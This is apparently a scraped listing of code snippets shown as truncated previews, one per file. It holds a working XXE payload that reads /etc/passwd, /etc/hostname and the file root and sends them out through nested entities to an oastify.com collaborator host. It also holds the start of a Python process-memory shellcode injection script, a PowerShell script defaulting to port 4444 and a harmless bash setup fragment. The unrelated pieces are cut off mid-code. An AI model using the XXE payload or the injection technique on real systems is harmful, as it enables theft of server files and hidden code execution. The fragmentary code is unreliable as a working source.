This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % fileW SYSTEM "file:///etc/hostname"> | |
<!ENTITY % fileL SYSTEM "file:///etc/passwd"> | |
<!ENTITY % fileZ SYSTEM "file:///"> | |
<!ENTITY % fileE SYSTEM "file://asdasdin/a"> | |
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileW;'>"> | |
<!ENTITY % evalq "<!ENTITY % exfiltrateq SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileL;'>"> | |
<!ENTITY % evala "<!ENTITY % exfiltratea SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
<!ENTITY % evale "<!ENTITY % exfiltratee SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
%eval; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
ls ~/.zshrc_copy || cp ~/.zshrc ~/.zshrc_copy | |
# Abort on errors | |
set -e | |
# Function to install a package only if it's not already installed | |
function install_if_needed() { | |
local pkg="$1" | |
if ! dpkg -l "$pkg" &>/dev/null ; then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Remote Process Memory Injection | |
# Doesn't work on every program | |
# Tested with .NET programs (EarTrumpet, Greenshot) | |
import sys | |
from ctypes import * | |
import psutil | |
shellCode = b"Shell_code_here" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
param ($DPath, $DPort) | |
if (!$DPath) | |
{ | |
$DPath = '.' | |
} | |
if (!$DPort) | |
{ | |
$DPort = '4444' |